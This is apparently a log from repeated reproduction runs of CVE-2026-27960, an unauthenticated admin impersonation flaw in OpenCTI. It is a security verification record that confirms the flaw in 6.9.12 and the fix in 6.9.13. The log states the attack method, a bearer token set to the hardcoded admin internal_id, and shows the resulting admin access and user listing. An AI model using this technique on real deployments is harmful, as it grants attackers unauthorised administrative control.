[05:11:21] === CVE-2026-27960 reproduction: OpenCTI unauthenticated admin impersonation === [05:11:21] [vuln] starting dependencies [05:11:22] [vuln] waiting for elasticsearch [05:11:43] [vuln] waiting for minio [05:11:43] [vuln] waiting for rabbitmq [05:11:44] [vuln] starting opencti/platform:6.9.12 [05:11:44] [vuln] waiting for opencti platform health (migrations can take several minutes) [05:16:26] === CVE-2026-27960 reproduction: OpenCTI unauthenticated admin impersonation === [05:16:26] [vuln] starting dependencies [05:16:26] [vuln] waiting for elasticsearch [05:16:47] [vuln] waiting for minio [05:16:47] [vuln] waiting for rabbitmq [05:16:47] [vuln] starting opencti/platform:6.9.12 [05:16:48] [vuln] waiting for opencti platform health (migrations can take several minutes) [05:17:23] [vuln] platform healthy after ~40s [05:17:23] [vuln] attack response (Bearer = hardcoded admin internal_id, no credentials): {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:17:23] [vuln] admin-only users listing via impersonation: {"data":{"users":{"edges":[{"node":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","user_email":"admin@opencti.io"}}]}}} [05:17:23] [vuln] CONFIRMED: unauthenticated bearer=admin_internal_id authenticated as admin@opencti.io and listed users [05:17:23] [fixed] starting dependencies [05:17:24] [fixed] waiting for elasticsearch [05:17:45] [fixed] waiting for minio [05:17:45] [fixed] waiting for rabbitmq [05:17:46] [fixed] starting opencti/platform:6.9.13 [05:17:46] [fixed] waiting for opencti platform health (migrations can take several minutes) [05:18:16] [fixed] platform healthy after ~35s [05:18:16] [fixed] same attack against 6.9.13: {"errors":[{"message":"You must be logged in to do this.","locations":[{"line":1,"column":9}],"path":["me"],"extensions":{"code":"AUTH_REQUIRED","data":{"http_status":401,"genre":"TECHNICAL"}},"name":"AUTH_REQUIRED"}],"data":null} [05:18:16] [fixed] control with real api_token against 6.9.13: {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:18:16] [fixed] CONFIRMED: attack rejected on 6.9.13 while real token still works [05:20:27] === CVE-2026-27960 reproduction: OpenCTI unauthenticated admin impersonation === [05:20:27] [vuln] starting dependencies [05:20:28] [vuln] waiting for elasticsearch [05:20:54] [vuln] waiting for minio [05:20:54] [vuln] waiting for rabbitmq [05:20:55] [vuln] starting opencti/platform:6.9.12 [05:20:55] [vuln] waiting for opencti platform health (migrations can take several minutes) [05:21:25] [vuln] platform healthy after ~35s [05:21:25] [vuln] attack response (Bearer = hardcoded admin internal_id, no credentials): {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:21:25] [vuln] admin-only users listing via impersonation: {"data":{"users":{"edges":[{"node":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","user_email":"admin@opencti.io"}}]}}} [05:21:25] [vuln] CONFIRMED: unauthenticated bearer=admin_internal_id authenticated as admin@opencti.io and listed users [05:21:26] [fixed] starting dependencies [05:21:28] [fixed] waiting for elasticsearch [05:21:54] [fixed] waiting for minio [05:21:54] [fixed] waiting for rabbitmq [05:21:56] [fixed] starting opencti/platform:6.9.13 [05:21:57] [fixed] waiting for opencti platform health (migrations can take several minutes) [05:22:32] [fixed] platform healthy after ~40s [05:22:32] [fixed] same attack against 6.9.13: {"errors":[{"message":"You must be logged in to do this.","locations":[{"line":1,"column":9}],"path":["me"],"extensions":{"code":"AUTH_REQUIRED","data":{"http_status":401,"genre":"TECHNICAL"}},"name":"AUTH_REQUIRED"}],"data":null} [05:22:32] [fixed] control with real api_token against 6.9.13: {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:22:32] [fixed] CONFIRMED: attack rejected on 6.9.13 while real token still works [05:22:33] RESULT: CVE-2026-27960 CONFIRMED (vulnerable 6.9.12 impersonated default admin unauthenticated; fixed 6.9.13 rejected) [05:24:52] === CVE-2026-27960 reproduction: OpenCTI unauthenticated admin impersonation === [05:24:52] [vuln] starting dependencies [05:24:52] [vuln] waiting for elasticsearch [05:25:13] [vuln] waiting for minio [05:25:13] [vuln] waiting for rabbitmq [05:25:14] [vuln] starting opencti/platform:6.9.12 [05:25:14] [vuln] waiting for opencti platform health (migrations can take several minutes) [05:25:39] [vuln] platform healthy after ~30s [05:25:39] [vuln] attack response (Bearer = hardcoded admin internal_id, no credentials): {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:25:39] [vuln] admin-only users listing via impersonation: {"data":{"users":{"edges":[{"node":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","user_email":"admin@opencti.io"}}]}}} [05:25:39] [vuln] CONFIRMED: unauthenticated bearer=admin_internal_id authenticated as admin@opencti.io and listed users [05:25:39] [fixed] starting dependencies [05:25:40] [fixed] waiting for elasticsearch [05:26:01] [fixed] waiting for minio [05:26:01] [fixed] waiting for rabbitmq [05:26:01] [fixed] starting opencti/platform:6.9.13 [05:26:01] [fixed] waiting for opencti platform health (migrations can take several minutes) [05:26:26] [fixed] platform healthy after ~30s [05:26:26] [fixed] same attack against 6.9.13: {"errors":[{"message":"You must be logged in to do this.","locations":[{"line":1,"column":9}],"path":["me"],"extensions":{"code":"AUTH_REQUIRED","data":{"http_status":401,"genre":"TECHNICAL"}},"name":"AUTH_REQUIRED"}],"data":null} [05:26:27] [fixed] control with real api_token against 6.9.13: {"data":{"me":{"id":"88ec0c6a-13ce-5e39-b486-354fe4a7084f","name":"admin","user_email":"admin@opencti.io"}}} [05:26:27] [fixed] CONFIRMED: attack rejected on 6.9.13 while real token still works [05:26:27] RESULT: CVE-2026-27960 CONFIRMED (vulnerable 6.9.12 impersonated default admin unauthenticated; fixed 6.9.13 rejected)